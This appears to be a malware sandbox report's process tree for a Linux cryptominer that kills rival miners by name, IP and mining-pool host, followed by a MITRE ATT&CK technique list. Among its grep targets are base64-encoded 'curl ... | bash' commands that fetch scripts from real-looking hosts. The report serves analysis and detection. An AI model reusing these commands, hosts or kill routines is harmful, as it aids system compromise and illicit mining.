  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2154
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2165
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2164
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2163
- /bin/grep
  grep -v grep
  2⤵
  PID:2162
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2161
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2170
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2169
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2168
- /bin/grep
  grep -v grep
  2⤵
  PID:2167
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2166
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2175
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2174
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2173
- /bin/grep
  grep -v grep
  2⤵
  PID:2172
- /bin/ps
  ps aux
  2⤵
  PID:2171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2182
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2181
- /bin/grep
  grep -v _
  2⤵
  PID:2180
- /bin/grep
  grep -v -
  2⤵
  PID:2179
- /bin/grep
  grep -v /
  2⤵
  PID:2178
- /bin/grep
  grep -v grep
  2⤵
  PID:2177
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2176
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2187
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2186
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2185
- /bin/grep
  grep -v grep
  2⤵
  PID:2184
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2183
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2192
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2191
- /bin/grep
  grep rsync
  2⤵
  PID:2190
- /bin/grep
  grep -v grep
  2⤵
  PID:2189
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2188
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2197
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2196
- /bin/grep
  grep watchd0g
  2⤵
  PID:2195
- /bin/grep
  grep -v grep
  2⤵
  PID:2194
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2193
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2202
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2201
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2200
- /bin/grep
  grep -v grep
  2⤵
  PID:2199
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2198
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2207
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2206
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2205
- /bin/grep
  grep -v grep
  2⤵
  PID:2204
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2203
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2212
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2211
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2210
- /bin/grep
  grep -v grep
  2⤵
  PID:2209
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2208
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2217
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2216
- /bin/grep
  grep gitee.com
  2⤵
  PID:2215
- /bin/grep
  grep -v grep
  2⤵
  PID:2214
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2213
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2222
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2221
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2220
- /bin/grep
  grep -v grep
  2⤵
  PID:2219
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2218
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2227
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2226
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2225
- /bin/grep
  grep -v grep
  2⤵
  PID:2224
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2223
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2231
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2230
- /bin/grep
  grep -v grep
  2⤵
  PID:2229
- /bin/ps
  ps aux
  2⤵
  PID:2228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2236
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2235
- /bin/grep
  grep -v grep
  2⤵
  PID:2234
- /bin/ps
  ps aux
  2⤵
  PID:2233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2241
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2240
- /bin/grep
  grep -v grep
  2⤵
  PID:2239
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2238
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2247
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2246
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2245
- /bin/grep
  grep -v grep
  2⤵
  PID:2244
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2251
- /bin/grep
  grep netdns
  2⤵
  PID:2250
- /bin/grep
  grep -v grep
  2⤵
  PID:2249
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2257
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2256
- /bin/grep
  grep watchdogs
  2⤵
  PID:2255
- /bin/grep
  grep -v grep
  2⤵
  PID:2254
- /bin/ps
  ps aux
  2⤵
  PID:2253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2269
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:2268
- /bin/grep
  grep -v postgresq1
  2⤵
  PID:2267
- /bin/grep
  grep -v atd
  2⤵
  PID:2265
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:2266
- /bin/grep
  grep -v apache2
  2⤵
  PID:2264
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:2263
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:2262
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:2261
- /bin/grep
  grep -v root
  2⤵
  PID:2260
- /bin/grep
  grep -v grep
  2⤵
  PID:2259
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2275
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2274
- /bin/grep
  grep " ps"
  2⤵
  PID:2273
- /bin/grep
  grep -v aux
  2⤵
  PID:2272
- /bin/grep
  grep -v grep
  2⤵
  PID:2271
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2270
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2280
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2279
- /bin/grep
  grep sync_supers
  2⤵
  PID:2278
- /bin/grep
  grep -v grep
  2⤵
  PID:2277
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2276
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2285
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2284
- /bin/grep
  grep cpuset
  2⤵
  PID:2283
- /bin/grep
  grep -v grep
  2⤵
  PID:2282
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2281
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2291
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2290
- /bin/grep
  grep "x]"
  2⤵
  PID:2289
- /bin/grep
  grep -v aux
  2⤵
  PID:2288
- /bin/grep
  grep -v grep
  2⤵
  PID:2287
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2286
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2296
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2295
- /bin/grep
  grep -v aux
  2⤵
  PID:2294
- /bin/grep
  grep -v grep
  2⤵
  PID:2293
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2292
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2303
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2302
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2301
- /bin/grep
  grep -v aux
  2⤵
  PID:2300
- /bin/grep
  grep -v grep
  2⤵
  PID:2299
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2308
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2307
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2306
- /bin/grep
  grep -v grep
  2⤵
  PID:2305
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2304
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2313
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2312
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2311
- /bin/grep
  grep -v grep
  2⤵
  PID:2310
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2309
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2318
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2317
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2316
- /bin/grep
  grep -v grep
  2⤵
  PID:2315
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2314
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2323
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2322
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2321
- /bin/grep
  grep -v grep
  2⤵
  PID:2320
- /bin/ps
  ps aux
  2⤵
  PID:2319
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2328
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2327
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2326
- /bin/grep
  grep -v grep
  2⤵
  PID:2325
- /bin/ps
  ps aux
  2⤵
  PID:2324
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2333
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2332
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2331
- /bin/grep
  grep -v grep
  2⤵
  PID:2330
- /bin/ps
  ps aux
  2⤵
  PID:2329
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2338
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2337
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2336
- /bin/grep
  grep -v grep
  2⤵
  PID:2335
- /bin/ps
  ps aux
  2⤵
  PID:2334
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2343
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2342
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2341
- /bin/grep
  grep -v grep
  2⤵
  PID:2340
- /bin/ps
  ps aux
  2⤵
  PID:2339
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2348
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2347
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2346
- /bin/grep
  grep -v grep
  2⤵
  PID:2345
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2344
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2353
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2352
- /bin/grep
  grep sustse
  2⤵
  PID:2351
- /bin/grep
  grep -v grep
  2⤵
  PID:2350
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2349
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2358
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2357
- /bin/grep
  grep sustse3
  2⤵
  PID:2356
- /bin/grep
  grep -v grep
  2⤵
  PID:2355
- /bin/ps
  ps aux
  2⤵
  PID:2354
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2364
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2363
- /bin/grep
  grep wget
  2⤵
  PID:2362
- /bin/grep
  grep mr.sh
  2⤵
  PID:2361
- /bin/grep
  grep -v grep
  2⤵
  PID:2360
- /bin/ps
  ps aux
  2⤵
  PID:2359
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2370
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2369
- /bin/grep
  grep curl
  2⤵
  PID:2368
- /bin/grep
  grep mr.sh
  2⤵
  PID:2367
- /bin/grep
  grep -v grep
  2⤵
  PID:2366
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2365
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2375
- /bin/grep
  grep wget
  2⤵
  PID:2374
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2373
- /bin/grep
  grep -v grep
  2⤵
  PID:2372
- /bin/ps
  ps aux
  2⤵
  PID:2371
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2382
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2381
- /bin/grep
  grep curl
  2⤵
  PID:2380
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2379
- /bin/grep
  grep -v grep
  2⤵
  PID:2378
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2377
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2388
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2387
- /bin/grep
  grep wget
  2⤵
  PID:2386
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2385
- /bin/grep
  grep -v grep
  2⤵
  PID:2384
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2383
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2394
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2393
- /bin/grep
  grep curl
  2⤵
  PID:2392
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2391
- /bin/grep
  grep -v grep
  2⤵
  PID:2390
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2400
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2399
- /bin/grep
  grep wget
  2⤵
  PID:2398
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2397
- /bin/grep
  grep -v grep
  2⤵
  PID:2396
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2395
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2406
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2405
- /bin/grep
  grep curl
  2⤵
  PID:2404
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2403
- /bin/grep
  grep -v grep
  2⤵
  PID:2402
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2401
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2411
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2410
- /bin/grep
  grep j2.conf
  2⤵
  PID:2409
- /bin/grep
  grep -v grep
  2⤵
  PID:2408
- /bin/ps
  ps aux
  2⤵
  PID:2407
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2417
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2416
- /bin/grep
  grep wget
  2⤵
  PID:2415
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2414
- /bin/grep
  grep -v grep
  2⤵
  PID:2413
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2412
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2423
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2422
- /bin/grep
  grep curl
  2⤵
  PID:2421
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2420
- /bin/grep
  grep -v grep
  2⤵
  PID:2419
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2418
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2429
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2428
- /bin/grep
  grep wget
  2⤵
  PID:2427
- /bin/grep
  grep ficov
  2⤵
  PID:2426
- /bin/grep
  grep -v grep
  2⤵
  PID:2425
- /bin/ps
  ps aux
  2⤵
  PID:2424
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2435
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2434
- /bin/grep
  grep curl
  2⤵
  PID:2433
- /bin/grep
  grep ficov
  2⤵
  PID:2432
- /bin/grep
  grep -v grep
  2⤵
  PID:2431
- /bin/ps
  ps aux
  2⤵
  PID:2430
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2441
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2440
- /bin/grep
  grep wget
  2⤵
  PID:2439
- /bin/grep
  grep he.sh
  2⤵
  PID:2438
- /bin/grep
  grep -v grep
  2⤵
  PID:2437
- /bin/ps
  ps aux
  2⤵
  PID:2436
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2447
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2446
- /bin/grep
  grep curl
  2⤵
  PID:2445
- /bin/grep
  grep he.sh
  2⤵
  PID:2444
- /bin/grep
  grep -v grep
  2⤵
  PID:2443
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2442
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2453
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2452
- /bin/grep
  grep wget
  2⤵
  PID:2451
- /bin/grep
  grep miner.sh
  2⤵
  PID:2450
- /bin/grep
  grep -v grep
  2⤵
  PID:2449
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2448
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2459
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2458
- /bin/grep
  grep curl
  2⤵
  PID:2457
- /bin/grep
  grep miner.sh
  2⤵
  PID:2456
- /bin/grep
  grep -v grep
  2⤵
  PID:2455
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2454
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2465
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2464
- /bin/grep
  grep wget
  2⤵
  PID:2463
- /bin/grep
  grep nullcrew
  2⤵
  PID:2462
- /bin/grep
  grep -v grep
  2⤵
  PID:2461
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2460
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2471
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2470
- /bin/grep
  grep curl
  2⤵
  PID:2469
- /bin/grep
  grep nullcrew
  2⤵
  PID:2468
- /bin/grep
  grep -v grep
  2⤵
  PID:2467
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2466
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2476
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2475
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2474
- /bin/grep
  grep -v grep
  2⤵
  PID:2473
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2472
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2481
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2480
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2479
- /bin/grep
  grep -v grep
  2⤵
  PID:2478
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2477
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2486
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2485
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2484
- /bin/grep
  grep -v grep
  2⤵
  PID:2483
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2482
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2491
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2490
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2489
- /bin/grep
  grep -v grep
  2⤵
  PID:2488
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2487
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2496
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2495
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2494
- /bin/grep
  grep -v grep
  2⤵
  PID:2493
- /bin/ps
  ps aux
  2⤵
  PID:2492
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2501
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2500
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2499
- /bin/grep
  grep -v grep
  2⤵
  PID:2498
- /bin/ps
  ps aux
  2⤵
  PID:2497
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2506
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2505
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2504
- /bin/grep
  grep -v grep
  2⤵
  PID:2503
- /bin/ps
  ps auxf
  2⤵
  PID:2502
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2511
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2510
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2509
- /bin/grep
  grep -v grep
  2⤵
  PID:2508
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2507
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2516
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2515
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2514
- /bin/grep
  grep -v grep
  2⤵
  PID:2513
- /bin/ps
  ps auxf
  2⤵
  PID:2512
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2521
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2520
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2519
- /bin/grep
  grep -v grep
  2⤵
  PID:2518
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2517
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2526
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2525
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2524
- /bin/grep
  grep -v grep
  2⤵
  PID:2523
- /bin/ps
  ps auxf
  2⤵
  PID:2522
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2531
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2530
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2529
- /bin/grep
  grep -v grep
  2⤵
  PID:2528
- /bin/ps
  ps auxf
  2⤵
  PID:2527
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2536
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2535
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2534
- /bin/grep
  grep -v grep
  2⤵
  PID:2533
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2532
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2541
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2540
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2539
- /bin/grep
  grep -v grep
  2⤵
  PID:2538
- /bin/ps
  ps auxf
  2⤵
  PID:2537
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2546
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2545
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2544
- /bin/grep
  grep -v grep
  2⤵
  PID:2543
- /bin/ps
  ps auxf
  2⤵
  PID:2542
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2551
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2550
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2549
- /bin/grep
  grep -v grep
  2⤵
  PID:2548
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2547
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2556
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2555
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2554
- /bin/grep
  grep -v grep
  2⤵
  PID:2553
- /bin/ps
  ps auxf
  2⤵
  PID:2552
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2561
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2560
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2559
- /bin/grep
  grep -v grep
  2⤵
  PID:2558
- /bin/ps
  ps auxf
  2⤵
  PID:2557
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2565

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

